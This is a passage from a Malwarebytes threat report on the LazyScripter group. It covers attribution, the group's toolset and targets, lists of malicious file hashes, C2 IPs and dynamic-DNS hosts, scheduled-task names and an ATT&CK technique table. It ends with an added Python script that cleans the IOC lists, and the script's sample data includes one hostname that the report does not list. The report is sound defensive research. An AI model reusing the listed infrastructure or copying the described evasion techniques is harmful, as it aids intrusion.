- Muddy Water has relied on targeted spear-phishing operations, while this actor relies on spam campaigns
- This actor has used several open-source frameworks and commercial malware (Octopus, Nishang, Quasar, Remcos, njRAT, RMS, NetWire and LuminosityLink RAT) that Muddy Water has not been observed using
- Muddy Water has used macro-weaponized maldocs; this actor does not use macros and instead embeds its loader directly in the maldoc as an embedded object
- Muddy Water has custom toolsets such as PowerStats and SharpStats, while this actor relies mainly on open-source tooling

In terms of infrastructure, several APT groups have used dynamic DNS for their C&C communications, including Scarlet Mimic, Putter Panda, Turla, Patchwork and APT33. Scarlet Mimic and Putter Panda in particular used the same free dynamic DNS provider, firewall-gateway.net. We found no other similarities between these groups and the actor analyzed here, and sharing a free dynamic DNS provider is not a reliable attribution signal on its own.

Based on the differences laid out in this section, we believe this is a new actor that has not been documented before, and we have therefore decided to track it as a new group that we call LazyScripter.

## Conclusion

In this paper we uncovered several campaigns associated with an actor group that we believe has been active since 2018.
Here are its main characteristics:

- Uses open-source offensive security toolsets at different stages of its attack kill chain, including PowerShell Empire, Koadic RAT, Octopus RAT, Nishang and Invoke-Ngrok
- Hosts payloads and scripts mostly on GitHub
- Uses scripting languages in its attacks: batch, VBScript, PowerShell and JavaScript
- Uses spam campaigns to spread its KOCTOPUS loader
- Mainly targets IATA and job seekers (in particular those who want to immigrate to Canada through the skilled worker program)
- Usually deploys two multi-stage backdoors in its attacks
- Uses commercially available RATs including Quasar, LuminosityLink, Remcos, njRAT, Adwind and RMS
- Uses a batch encryption tool to encrypt all of its batch loaders
- Uses embedded objects within the maldocs instead of macros

## Indicators of Compromise (IOCs)

| SHA-256 | Filename |
|---|---|
| 2d845bd6662e7449f4db7a922e67c665df70cd045af48e2cb3d689a5d0004b2f | Detail.doc |
| 2e016bca305b1fd0c360d1e7334956a967f48f8fddf6ba272556959769919e24 | canadavisa.doc |
| 240ed00d58e9d34bea58a29c8195d530a86d87c7575b3f699d7c512fd1bc9233 | Fiche_de_renseignement_25R9924N502567.docx.docx |
| 7099cdd24bb1eb0dbe3ab1bc1995e3e5cf577b2d232e088d948c8ff749b73795 | k.doc |
| 87b1b71337ae7bc237d677fd6559ea6432facb27252fcefcac24bb6132ae8ac8 | List of JOBS.doc |
| 785c2845af631f33fda47b5a0fe5ccb338389b15e028e1ae7fa418d991e2c38f | LIST OF JOBS.doc |
| 64cdfec0be049dd92388b1e5d8a5ef130907c8ea6a2a1f61564fd865892d24e8 | Information All JOBS.doc |
| eadae73398980c346cf5783b2f1119cc8af3619ce405f32b943b56013c27d597 | Information All Jobs.doc |
| c3379e83cd3e8763f80010176905f147fcc126b5e7ad9faa585d5520386bd659 | Recommendations Corona Virus.doc |
| f46200110df685967fe3521360be461b1204f8f39a2aa785c4885fe3f142082b | Details of Offers.doc |
| 51a631cf0940341f2682a84993b782e2c015ff2181a4c8894e38617643c6a4ca | COVID-19 & Travelers.doc |
| 2d845bd6662e7449f4db7a922e67c665df70cd045af48e2cb3d689a5d0004b2f | Job Details.Doc |
| ba6cc16770dc67c1af1a3e103c3fd19a854193e7cd1fecbb11ca11c2c47cdf04c | Hiring and working conditions.do |
| 905ef0ae8f5173b917a4f39063346825f4b23ae75cb4b3190300cb064bd002b9 | COVID-19 & Travelers.doc |
| 24a5c386efc5a5804374dcd92b0678d21cab637dadec124b5bed1fcd75c2bbd4 | JOB_SEARCH_FORM.pdf.zip |
| d3bd27edb6ae36518039ffcee592e4a1017d16fe4753ea2c92010a41ef9c4cac | Federal_Skilled_Worker_Program_Eligible_Occupations__Canada_Immigration_and_Visa_Information._Canad.pdf.exe |
| 1b819105e0971ebbcdc3ce4b5f317a8269370198ed369e1cdae9cdeb1c18c460 | JOB_SEARCH_FORM.pdf.exe |
| 0e5c1ff7ee751ed6c3ac9b22ddb7e35eaba24dd8b96a8f233b8c32d29cb012f5 | IATA_Secure.zip |
| 30c952a2a74d3c55b85f69638599d4f79d1684f37435a18e18879f4c5df39223 | IATA_Secure.bat |
| b18da5a6fac54acd62d08fd40e16745e6ed6c076ff38144ffe9ae25786134700 | MS-CV2020X-Update.zip |
| 1df686dd9367ecd6bba2e9d03cd130e854f097fad3b5d0f58fbe839e310feb5e | MS-CV2020X-Update.reg |
| 9936e7b3bd979e55b53f323bb70936a8e63c4852b42c9e0db6b42ddc97792dc0 | JOB_INFORMATION.zip |
| 07ae89016f95d512776efc1e7cbc188f2fa2e3bc23333d2361690628940ffdaa | APPWEB_IATA.zip |
| 14007fd206b747305392b9f8712afab5dd14b2efe4e62a0e26a4e8df6933fd67 | APPWEB_IATA.exe |
| 5b0f07aeb3bf79de8845b603bdf6f2db33fe4e5cef833b036c9834694cac9f5d | Detail.zip |
| 1b9e3a0e57de9a2ab43d04fa9ca32194209b794f03a232db3e8776e80e083c9b | Detail.pdf.exe |
| 56d6ea4c914404d73499da8004594cb8844d87fa471be5a26db305cf6c9576af | SSL_IATA_UPDATER.zip |
| 1df686dd9367ecd6bba2e9d03cd130e854f097fad3b5d0f58fbe839e310feb5e | SSL_IATA_UPDATER.reg |
| 730306cfa87a3cc1567c9fa580319b25e594453381e414c8b79b674c53ad50bb | BSPlinkUpdaterV4.zip |
| 47ba49ace38b677b82e264821274cfb0c531438b4449a2ee8a86f1488a0ec094 | BSPlinkUpdaterV4.exe |
| b0c171a7bf59face4a906dbaebb0a42c4bdcad79e23c93eaa11c0ff9f9e1b63e | IATA ONE ID.exe |
| 91573e2aad89c56aafd30ee2dd1155ef1e2b38a2d2856a3201e1f600e6685217 | |
| 3a5480d5ea288089567f338055545b05c195f8eaf350ec4698ca6cb03b91f787 | Qykk.exe |
| acbe0d54176227f28b98caaf141c82cc51e43a7b5797c1d3c76b01123e3f8f48 | Qyk.exe |
| 6d686b68de83cbadf89708c07251bf79180ade724e4a55c481533591a418885f | Qyk.exe |
| 3e06419b294d31b00627ab9bd911b8b28f530fd24082ddc4c8395c026e3977c2 | BSPlink Upgrade.zip |
| 7bc29edcbb6ab7fae89b87a34919f94988a114d522b066b0dcc223d69dbe0d57 | BSPlink Upgrade.exe |
| d9c29e1d6655e82c63fb393e70b74832e4ef9f51d4cf1eb4ced610147e8739ba | 1.exe |
| 76de9f8d6f0fcf8c5fb2bafc387c363e138af15cf751d2c2a230ad9cafd6271c | Setu-rms.exe |
| 084a9940f85047be896b1bb1769bd667cef30d15920d61bfc0728d8d87b839df | Ve.exe |
| 7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c | AdobeSD.exe |
| e351840760e757bcc6b26efdd13abb393f3595f9ee1dad6de7e4ac6016569ee1 | IATA_Security.zip |
| d0a92eca3053e644b8f40be86a62ecfabaf13c7681eb6a3fbf35c562561bf756 | SUPPORT_KIT_USER.zip |
| 540bcc8dde27c9f2e29b4478f7ee836eac14da37a26db4591d3031048e3949c3 | SUPPORT__KITS_USERS.zip |
| 9c78b1aa211ffc44fc476fe62c5ebb58f6b996f5fe34412e7a63da577ebb52ca | SUPPORT_KIT_USERS.zip |
| 2f92fb448dec9a56201f7381c8103a5c5e1f9d539a52df81357b1c285a4be6bb | SUPPORT_KITS__USERS.zip |
| 69ea7e22f714593a2c2283dc9dc688cccfe1904f40c234263617902a0c0cb538 | IATASecurity.zip |
| 56719d9276dba013668ff0ae2313e19dcf2daa4c41f623acdeb1d5190f161b59 | zim.bat |
| 8f21b526c64e6ed7dc949fd99302e3e003bd3f244471eb385413b7c5a3b9ebd3 | hidden.bat |
| 2804964569aaffaf982f244002029985cdddfba2e904c35bc5410430083313ed | hpjs.ps1 |
| f2a9d337ed894f2b3ba528abf6ec8b104852032b8ad1aacfd4057a1484b3f657 | ngr2.ps1 |
| 67887f90cfddd35aff1d439a466d9175affd468a93c08c2a3b6f2fbc6bf41e21 | ngr3.ps1 |
| 6b7c93cf1e392025652e528deb6e19a98077b5571eb0ed96f687a2101693cad4 | ngr.ps1 |
| d195e3b83e13a09d4d3f7b883123cbd273a8e43fdfb73a44797f413a3c1dc932 | OChpjs.ps1 |
| 39bafd701738224cfbf210b825d8b1700de390492f0281c2ea62bd8153d04101 | Ohpjs.ps1 |
| e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 | SUPPORT_KITS_USERS.pdf.bat |
| ba79fa5e4a294ca77fc7707901be60bddbc8fbe12d3c4b97b0361b9b33c5df25 | ua.bat |
| 7ae7eba2b69228f3a0b01a59dfc6868d14bab73350fc954e559f5092e6429068 | xt.ps1 |
| 5831d481f59a19416a9a081cd05db145f20d9ce47111fd6a6d6d0c1897691394 | kaz.bat |
| f1ba1a13ce24383f06d76239f0c20eb20031ab638a146418d20c6c5f0313e85e | lnk.bat |
| d11fa64725812816dc7d40dc2b4ff587d7c2c3642b4644eceaf7d5d45dc4a572 | mstsc.bat |
| e8e1af3431f3c68376cbd507bf8b4f7a5c0d88ce9ba92408e8fffba8f68cacc2 | Recruitment Notice.pdf |

Note on two entries above: the digest listed for "Hiring and working conditions.do" is 65 hexadecimal characters long, so it is not a valid SHA-256 as printed, and the digest listed for "SUPPORT_KITS_USERS.pdf.bat" is the SHA-256 of an empty file, which would match every zero-byte file on a system. Neither should be used for matching without verification.

**Others:**

- dfd64e1ef1c5f78a9ffaf9484ad944428a42c506d4bdd4abd06c36af1286f830
- 486c32527778d03a182ea138b120e65894c2a56694475d46cdaf8096c8315ef2
- a24478f2e4a427a3d51eee59494fcafc134a2f7438df6048bac78d7e03195e82
- 511fc2844f83b2db6dfa001fa807a481e307971a59cfc834fb05f91bcac7d1f7
- 5ded50f61bf34d7c99b9c80eb35aa0e99a38ab2fab43b98091fd7d51073ac598
- 221fe1c74b54724a51c15b442b1ab41dad11ce8504292881cc835c058c99f505
- 6c3b5ebd3e97986fbba855f042ad9be8729b960961491462bbec48ce67d7d9f9
- df4bc0d07bc6c384a0bf015959ea86cc7fd26853cd74f106e1e1711eb8d33bac
- 7c34b2290b9ef2ccb4fef71f1f657e8f4c5f71f1bcd58de1128abb79c8839e7c
- 9bfa0256d2278b0d57e87bf62c45201e4796f873fbab881e57bc1d5b42d9eb54
- f30e13a050375097f42f290b218306d31f67017cceb5bb2f126033b6646a25a5
- 563e2ba027e19da0880ef46a9db7a88a7f3f166ae545aa1d09c6372a4ace36fb
- 132664a7a25a029660a6295fb934799353dae5ab7bb5d39a419c8a15dd731b87
- 1cf356e4c59a8cce27d5defffcb4eb66140a162d539cbe4864e0b0c0eb9c9079
- 576eb01b09d8a2d7e8b8bb65bd23c237f80e70bb89ff03636574442c8414b271
- 33a5a796d49bfaee95a8d869c186850dc937e3e8801f409cb09d74fce7786f8f
- d9c29e1d6655e82c63fb393e70b74832e4ef9f51d4cf1eb4ced610147e8739ba
- ae8fa9b59fb15269e27cbbff6ad480cb53699eb56ff7bb36bcfd1b952a183e17
- fb9064cd8b791f3057907e0d2d7393e0188b346e1a52e38d234ff295086e6d71
- 084a9940f85047be896b1bb1769bd667cef30d15920d61bfc0728d8d87b839df
- 528a8493f9046d630a0dad91d445481da8657b98f9151c55e5ab95e529d21018
- cfbe2386ba456ec54ccb62d022906a782be2aec7c93b92d02dd5c74b62131585
- 50f600945cffb217dfec30e38cdd145f31f0a424ebb119c58072ab53afdea055
- 2775051020c869599208ae42eb5946b0977253d28298acb18061e51575adad1f
- cf48e8da9746c021438759740cae0a4aaffb2ed47ca0e6c738b58c3af9a48de0

**Network indicators:**

- 185.186.247.114
- kasperskylab.ignorelist.com
- hpsj.firewall-gateway.net
- googlechromeupdater.twilightparadox.com
- 157.245.243.62
- 216.189.145.11
- iatassl-telechargementsecurity.duckdns.org

**Scheduled task names:**

- WindowsVer
- WinDowsUpdates
- WindowsUpdatesU
- automaticChromeUpdater
- AutomaticU
- AutomaticAppUpdaterAU
- AutomaticMozila

## MITRE ATT&CK techniques

| Tactic | ID | Name | Details |
|---|---|---|---|
| Initial Access | T1566.001 | Spearphishing Attachment | |
| Initial Access | T1566.002 | Spearphishing Link | |
| Execution | T1204.001 | Malicious Link | Manual execution by user |
| Execution | T1204.002 | Malicious File | Manual execution by user |
| Execution | T1059.003 | Windows Command Shell | Starts CMD.EXE to execute commands |
| Execution | T1106 | Native API | |
| Execution | T1059.001 | PowerShell | Executes PowerShell scripts |
| Execution | T1053.005 | Scheduled Task | Loads the Task Scheduler DLL interface; uses Task Scheduler to run other applications |
| Execution | T1047 | Windows Management Instrumentation | powershell.exe executed via WMI |
| Persistence | T1546.001 | Change Default File Association | reg.exe changes the default file association |
| Persistence | T1546.012 | Image File Execution Options Injection | svchost.exe changes Image File Execution Options |
| Persistence | T1543.003 | Windows Service | Creates or modifies Windows services; modifies Windows Defender service settings |
| Persistence | T1547.001 | Registry Run Keys / Startup Folder | Changes the autorun value in the registry |
| Persistence | T1053.005 | Scheduled Task | Loads the Task Scheduler DLL interface; uses Task Scheduler to run other applications |
| Persistence | T1547.004 | Winlogon Helper DLL | Changes the logon/logoff helper path in the registry |
| Privilege Escalation | T1548.002 | Bypass User Account Control | Uses fodhelper and Event Viewer to bypass UAC |
| Privilege Escalation | T1546.012 | Image File Execution Options Injection | Changes Image File Execution Options |
| Defense Evasion | T1562.001 | Disable or Modify Tools | Modifies Windows Defender service settings |
| Defense Evasion | T1222.001 | Windows File and Directory Permissions Modification | Uses ATTRIB.EXE to modify file attributes |
| Defense Evasion | T1112 | Modify Registry | Uses REG.EXE to modify the Windows registry |
| Defense Evasion | T1218.005 | Mshta | Starts MSHTA.EXE to open HTA or HTML files |
| Defense Evasion | T1218.011 | Rundll32 | Uses RUNDLL32.EXE to load a library |
| Defense Evasion | T1548.002 | Bypass User Account Control | Uses fodhelper and Event Viewer to bypass UAC |
| Defense Evasion | T1140 | Deobfuscate/Decode Files or Information | Decodes Base64 and decrypts AES-encrypted traffic; uses AES encryption |
| Defense Evasion | T1027 | Obfuscated Files or Information | Uses obfuscation tools and Base64 encoding |
| Discovery | T1057 | Process Discovery | Obtains list of running processes |
| Discovery | T1082 | System Information Discovery | |
| Discovery | T1016 | System Network Configuration Discovery | |
| Discovery | T1033 | System Owner/User Discovery | |
| Discovery | T1124 | System Time Discovery | |
| Command and Control | T1071.001 | Web Protocols | |
| Command and Control | T1132.001 | Standard Encoding | Uses Base64 to encode the data |
| Command and Control | T1001 | Data Obfuscation | Uses AES encryption to encrypt the data |
| Command and Control | T1104 | Multi-Stage Channels | |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | |

Malwarebytes Inc., 3979 Freedom Circle, 12th Floor, Santa Clara, CA 95054 USA, +1 800 520 2796

© 2021 Malwarebytes. All Rights Reserved. Any brand name is the property of its respective owner, is used for identification purposes only, and does not imply product endorsement or affiliation with Malwarebytes.
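The following is an added worked example, not part of the Malwarebytes report, showing the two sanity checks a practitioner would run before loading the Infrastructure and IOC lists in this paper into a blocklist: validating the SHA-256 entries (rejecting digests that are not 64 hex characters, rejecting the SHA-256 of an empty file, and collapsing duplicate digests) and separating the network indicators into IP addresses and dynamic-DNS hostnames so that detections key on the full actor-controlled hostname rather than on a shared parent domain. The sample rows are copied from the IOC and network indicator lists above; the `DYNDNS_PROVIDERS` set, the function names and the result layout are this example's own assumptions.

```python
"""IOC hygiene checks for the LazyScripter indicator lists (added example)."""
import hashlib
import ipaddress
import re

SHA256_RE = re.compile(r"^[0-9a-f]{64}$")

# SHA-256 of zero bytes. An empty-file digest in an IOC list matches every
# zero-byte file on a host, so it must be dropped before the list is deployed.
EMPTY_SHA256 = hashlib.sha256(b"").hexdigest()

# Dynamic DNS shared parent domains seen in the report. Assumption: the set a
# defender maintains locally; extend it as new providers are observed.
DYNDNS_PROVIDERS = {
    "ignorelist.com",
    "firewall-gateway.net",
    "twilightparadox.com",
    "duckdns.org",
}

# Sample rows copied from the report's IOC table as (sha256, filename).
SAMPLE_HASHES = [
    ("2d845bd6662e7449f4db7a922e67c665df70cd045af48e2cb3d689a5d0004b2f", "Detail.doc"),
    ("2d845bd6662e7449f4db7a922e67c665df70cd045af48e2cb3d689a5d0004b2f", "Job Details.Doc"),
    ("ba6cc16770dc67c1af1a3e103c3fd19a854193e7cd1fecbb11ca11c2c47cdf04c", "Hiring and working conditions.do"),
    ("e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "SUPPORT_KITS_USERS.pdf.bat"),
    ("30c952a2a74d3c55b85f69638599d4f79d1684f37435a18e18879f4c5df39223", "IATA_Secure.bat"),
    ("1df686dd9367ecd6bba2e9d03cd130e854f097fad3b5d0f58fbe839e310feb5e", "MS-CV2020X-Update.reg"),
    ("1df686dd9367ecd6bba2e9d03cd130e854f097fad3b5d0f58fbe839e310feb5e", "SSL_IATA_UPDATER.reg"),
]

# Network indicators copied from the report (IPs and dynamic-DNS hostnames).
SAMPLE_NETWORK = [
    "185.186.247.114",
    "kasperskylab.ignorelist.com",
    "hpsj.firewall-gateway.net",
    "googlechromeupdater.twilightparadox.com",
    "157.245.243.62",
    "216.189.145.11",
    "iatassl-telechargementsecurity.duckdns.org",
    "stub.ignorelist.com",
]


def check_hashes(rows):
    """Validate (sha256, filename) rows.

    Returns a dict with keys 'valid', 'invalid', 'empty' and 'duplicates'.
    A duplicate is recorded as (digest, first_filename, later_filename).
    """
    seen = {}
    result = {"valid": [], "invalid": [], "empty": [], "duplicates": []}
    for digest, name in rows:
        d = digest.strip().lower()
        if not SHA256_RE.match(d):
            # Wrong length or non-hex characters: a transcription error,
            # not an indicator that can match anything.
            result["invalid"].append((digest, name))
        elif d == EMPTY_SHA256:
            result["empty"].append((d, name))
        elif d in seen:
            result["duplicates"].append((d, seen[d], name))
        else:
            seen[d] = name
            result["valid"].append((d, name))
    return result


def classify_network(indicators):
    """Split network IOCs into IPs, dynamic-DNS hostnames and other hostnames.

    Dynamic-DNS hosts are returned as (subdomain, provider) pairs so that a
    rule can alert on the full hostname instead of the shared provider domain.
    """
    result = {"ips": [], "dyndns": [], "other_hosts": []}
    for ind in indicators:
        try:
            result["ips"].append(str(ipaddress.ip_address(ind)))
            continue
        except ValueError:
            pass  # not an IP literal, treat as a hostname
        labels = ind.lower().rstrip(".").split(".")
        provider = ".".join(labels[-2:])  # registrable parent domain
        if len(labels) > 2 and provider in DYNDNS_PROVIDERS:
            result["dyndns"].append((".".join(labels[:-2]), provider))
        else:
            result["other_hosts"].append(".".join(labels))
    return result


if __name__ == "__main__":
    hashes = check_hashes(SAMPLE_HASHES)
    for key in ("invalid", "empty", "duplicates"):
        for entry in hashes[key]:
            print(f"{key}: {entry}")
    network = classify_network(SAMPLE_NETWORK)
    for sub, prov in network["dyndns"]:
        print(f"dyndns host: {sub}.{prov} (provider {prov})")
```

Running the block against the sample rows reports one invalid digest (65 characters), one empty-file digest, two duplicate pairs, and five dynamic-DNS hostnames across four providers, which is the cleaned set worth pushing to a detection platform.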